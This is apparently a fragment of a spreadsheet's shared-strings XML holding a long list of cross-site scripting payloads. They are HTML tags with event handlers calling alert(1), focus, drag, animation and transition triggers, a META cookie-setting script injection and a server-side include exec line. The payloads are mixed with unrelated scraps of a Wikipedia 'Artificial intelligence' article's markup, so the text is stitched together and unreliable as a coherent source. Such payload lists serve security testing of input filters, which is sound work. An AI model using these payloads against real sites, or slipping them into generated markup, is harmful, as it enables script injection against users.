    <t>&lt;rp oncut="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;address onmousemove="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;ol id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/ol&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('')&lt;/SCRIPT&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;header onpointerover=alert(1)&gt;XSS&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;strike onbeforepaste="alert(1)" contenteditable&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;image onkeypress="alert(1)" contenteditable&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;input/onmouseover="javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;"</t>
  </si>
  <si>
    <t>&lt;pre draggable="true" ondrag="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;head id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;article id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onbeforecopy="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('')&lt;/SCRIPT&gt;"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Knowledge representation </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-390"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-390"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;sup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;canvas oncontextmenu="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;nobr draggable="true" ondragstart="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;961 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dt onmouseenter="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;map onpointerleave=alert(1)&gt;XSS&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;em id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onbeforecut="alert(1)" contenteditable&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;menu draggable="true" ondragleave="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;!--#exec cmd="/bin/echo '&lt;SCR'"--&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;menu id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onkeypress="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;cite style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onkeydown="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;dfn style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;ins onpointerout=alert(1)&gt;XSS&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;kbd id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/kbd&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;map onbeforecopy="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-75"&gt;&lt;a href="#Other_sources"&gt;&lt;span class="tocnumber"&gt;13.3 </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-121"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-121"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;th onpointerup=alert(1)&gt;XSS&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Existential_risk_from_artificial_general_intelligence" title="Existential risk from artificial general intelligence"&gt;Existential risk from artificial general intelligence &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computer_vision" title="Computer vision"&gt;Computer vision &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;cite id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-97"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-97"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;q onpointerup=alert(1)&gt;XSS&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Superintelligence" title="Superintelligence"&gt;Superintelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-399"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-399"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;legend id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;param onmouseenter="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;body style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mental_property" title="Mental property"&gt;Mental property &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;meter onload=alert(1)&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;dl id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="/wiki/Joseph_Weizenbaum" title="Joseph Weizenbaum"&gt;Joseph Weizenbaum &lt;/a&gt; wrote that AI applications cannot, by definition, successfully simulate genuine human empathy and that the use of AI technology in fields such as &lt;a href="/wiki/Customer_service" title="Customer service"&gt;customer service &lt;/a&gt; or &lt;a href="/wiki/Psychotherapy" title="Psychotherapy"&gt;psychotherapy &lt;/a&gt;&lt;sup id="cite_ref-380" class="reference"&gt;&lt;a href="#cite_note-380"&gt;&amp;#91;369&amp;#93; &lt;/a&gt; &lt;/sup&gt; was deeply misguided. Weizenbaum was also bothered that AI researchers (and some philosophers) were willing to view the human mind as nothing more than a computer program (a position now known as &lt;a href="/wiki/Computationalism" class="mw-redirect" title="Computationalism"&gt;computationalism &lt;/a&gt;). To Weizenbaum these points suggest that AI research devalues human life.&lt;sup id="cite_ref-Weizenbaum&amp;#39;s_critique_381-0" class="reference"&gt;&lt;a href="#cite_note-Weizenbaum&amp;#39;s_critique-381"&gt;&amp;#91;370&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/practices.html"&gt;&lt;span class="doc"&gt;Common Practices</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFThro1993"&gt;Thro 1993 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;input onpointerover=alert(1)&gt;XSS&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;col onmousemove="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;&lt;a href="/wiki/J%C3%BCrgen_Schmidhuber" title="Jürgen Schmidhuber"&gt;Schmidhuber, Jürgen &lt;/a&gt; (2015). "Deep Learning". &lt;i&gt;Scholarpedia &lt;/i&gt;. &lt;b&gt;10 &lt;/b&gt; (11): 32832. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2015SchpJ..1032832S"&gt;2015SchpJ..1032832S &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.4249%2Fscholarpedia.32832"&gt;10.4249/scholarpedia.32832 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Scholarpedia&amp;amp;rft.atitle=Deep+Learning&amp;amp;rft.volume=10&amp;amp;rft.issue=11&amp;amp;rft.pages=32832&amp;amp;rft.date=2015&amp;amp;rft_id=info%3Adoi%2F10.4249%2Fscholarpedia.32832&amp;amp;rft_id=info%3Abibcode%2F2015SchpJ..1032832S&amp;amp;rft.aulast=Schmidhuber&amp;amp;rft.aufirst=J%C3%BCrgen&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 9, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ol onkeydown="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;li onkeyup="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_machine_vision" title="Glossary of machine vision"&gt;Machine vision &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rt onblur=alert(1) tabindex=1 id=x&gt;&lt;/rt&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;title onpointerout=alert(1)&gt;XSS&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onpointerout=alert(1)&gt;XSS&lt;/nobr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHernandez-Orallo2000" class="citation journal"&gt;Hernandez-Orallo, Jose (2000). "Beyond the Turing Test". &lt;i&gt;Journal of Logic, Language and Information &lt;/i&gt;. &lt;b&gt;9 &lt;/b&gt; (4): 447–466. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1023%2FA%3A1008367325700"&gt;10.1023/A:1008367325700 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Journal+of+Logic%2C+Language+and+Information&amp;amp;rft.atitle=Beyond+the+Turing+Test&amp;amp;rft.volume=9&amp;amp;rft.issue=4&amp;amp;rft.pages=447-466&amp;amp;rft.date=2000&amp;amp;rft_id=info%3Adoi%2F10.1023%2FA%3A1008367325700&amp;amp;rft.aulast=Hernandez-Orallo&amp;amp;rft.aufirst=Jose&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;bdi id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/bdi&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://searcherp.techtarget.com/news/252460208/Oracle-CEO-Mark-Hurd-sees-no-reason-to-fear-ERP-AI"&gt;"Oracle CEO Mark Hurd sees no reason to fear ERP AI" &lt;/a&gt;. &lt;i&gt;SearchERP &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;6 May </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;wbr ondragover=alert(1) contenteditable&gt;drop here&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;453–541 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onmouseenter="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;address onpointerout=alert(1)&gt;XSS&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;p onmouseleave="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;multicol oncontextmenu="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;bdo draggable="true" ondragend="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;th draggable="true" ondragstart="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;legend onpointermove=alert(1)&gt;XSS&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;dir onmouseenter="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup id=x tabindex=1 onfocus=alert(1)&gt;&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Language_of_thought_hypothesis" title="Language of thought hypothesis"&gt;Language of thought &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dd onpointermove=alert(1)&gt;XSS&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style onblur=alert(1) tabindex=1 id=x&gt;&lt;/style&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Bayesian_learning-209"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Bayesian_learning_209-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;applet id=x tabindex=1 onfocus=alert(1)&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;summary onkeypress="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;ul onmouseout="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote draggable="true" ondrag="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;keygen draggable="true" ondragstart="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;aside ondblclick="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;591–632 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onbeforepaste="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;ul onmouseover="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;summary onbeforecopy="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onkeypress="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;dir onbeforecopy="alert(1)" contenteditable&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onpointerover=alert(1)&gt;XSS&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;map id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;custom tags onpointerleave=alert(1)&gt;XSS&lt;/custom tags&gt;</t>
  </si>
  <si>
    <t>&lt;xmp draggable="true" ondragleave="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onbeforepaste=alert(1) autofocus&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;option onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/option&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_structural_engineering" title="Glossary of structural engineering"&gt;Structural engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;abbr ondrop=alert(1) contenteditable&gt;drop here&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/The_Precipice:_Existential_Risk_and_the_Future_of_Humanity" title="The Precipice: Existential Risk and the Future of Humanity"&gt;The Precipice &lt;/a&gt; &lt;/i&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;img oncopy="alert(1)" contenteditable&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;s ondragover=alert(1) contenteditable&gt;drop here&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;hr ondrop=alert(1) contenteditable&gt;drop here&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;ins id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/ins&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;td draggable="true" ondragstart="alert(1)"&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;big oncopy="alert(1)" contenteditable&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;table onbeforecopy="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;details ondrop=alert(1) contenteditable&gt;drop here&lt;/details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-16"&gt;&lt;a href="#Symbolic"&gt;&lt;span class="tocnumber"&gt;5.2 </t>
  </si>
  <si>
    <t>&lt;hr onpointerenter=alert(1)&gt;XSS&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;nav oncut="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;summary draggable="true" ondragstart="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;data id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;label onpaste="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/practices.html"&gt;Common Practices&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;cite draggable="true" ondragleave="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;big id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;cite id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;aside style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;object style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;element onmouseout="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;ins id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;input type=radio id=x onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;del id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onpointerup=alert(1)&gt;XSS&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;caption oncopy="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;area id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;footer onmouseleave="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/McCarthy_Formalism" title="McCarthy Formalism"&gt;McCarthy Formalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;button draggable="true" ondragstart="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;style id=x tabindex=1 onfocus=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;track id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.neunet.2014.09.003"&gt;10.1016/j.neunet.2014.09.003 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/25462637"&gt;25462637 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Neural+Networks&amp;amp;rft.atitle=Deep+Learning+in+Neural+Networks%3A+An+Overview&amp;amp;rft.volume=61&amp;amp;rft.pages=85-117&amp;amp;rft.date=2015&amp;amp;rft_id=info%3Aarxiv%2F1404.7828&amp;amp;rft_id=info%3Apmid%2F25462637&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.neunet.2014.09.003&amp;amp;rft.aulast=Schmidhuber&amp;amp;rft.aufirst=J.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;keygen id=x tabindex=1 onactivate=alert(1)&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;sub onkeydown="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;17, who write "for the next 20 years the field would be dominated by these people and their students." &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;s onpointerdown=alert(1)&gt;XSS&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;mark oncopy="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;var id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/var&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;a style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;th id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;progress ondblclick="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Inductionism" title="Inductionism"&gt;Inductionism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;xmp ondblclick="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;script onpointerout=alert(1)&gt;XSS&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onpaste="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Abductive_reasoning" title="Abductive reasoning"&gt;Abductive reasoning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;frame onmousedown="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;blink style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Interactive_evolutionary_computation" title="Interactive evolutionary computation"&gt;Interactive evolutionary computation &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;s onpointerenter=alert(1)&gt;XSS&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onpointerup=alert(1)&gt;XSS&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;table oncopy="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;img onmousemove="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;img onmouseup="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;object id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;input onblur=alert(1) id=x&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Ars_Electronica_Exhibition_&amp;#39;&amp;#39;Understanding_AI&amp;#39;&amp;#39;-348"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Ars_Electronica_Exhibition_&amp;#39;&amp;#39;Understanding_AI&amp;#39;&amp;#39;_348-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;bdo ondrop=alert(1) contenteditable&gt;drop here&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;font style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;var style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/var&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Breadth_of_commonsense_knowledge-106"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Breadth_of_commonsense_knowledge_106-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
